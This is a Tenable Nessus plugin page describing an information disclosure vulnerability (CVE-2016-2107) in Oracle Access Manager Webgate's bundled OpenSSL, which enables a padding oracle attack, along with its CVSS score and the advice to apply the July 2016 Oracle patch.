Oracle Access Manager Webgate Information Disclosure (July 2016 CPU)

This script is Copyright (C) 2016-2017 Tenable Network Security, Inc.


Synopsis :

An authentication management application installed on the remote host
is affect by an information disclosure vulnerability.

Description :

The version of Oracle Access Manager installed on the remote host is
affected by an information disclosure vulnerability in the Web Server
Plugin subcomponent due to multiple flaws that exist in the bundled
OpenSSL library, specifically in the aesni_cbc_hmac_sha1_cipher()
function within file crypto/evp/e_aes_cbc_hmac_sha1.c and in the
aesni_cbc_hmac_sha256_cipher() function within file
crypto/evp/e_aes_cbc_hmac_sha256.c, which are triggered when the
connection uses an AES-CBC cipher and AES-NI is supported by the
server. A man-in-the-middle attacker can exploit these flaws to
conduct a padding oracle attack, resulting in the ability to decrypt
the network traffic.

See also :

http://www.nessus.org/u?e49b75d6

Solution :

Apply the appropriate patches according to the July 2016 Oracle
Critical Patch Update advisory.

Risk factor :

Low / CVSS Base Score : 2.6
(CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)

Family: Misc.

Nessus Plugin ID: 93121 ()

Bugtraq ID: 89760

CVE ID: CVE-2016-2107

Ready to Amp Up Your Nessus Experience?

Get Nessus Professional to scan unlimited IPs, run compliance checks & more

Buy Nessus Professional Now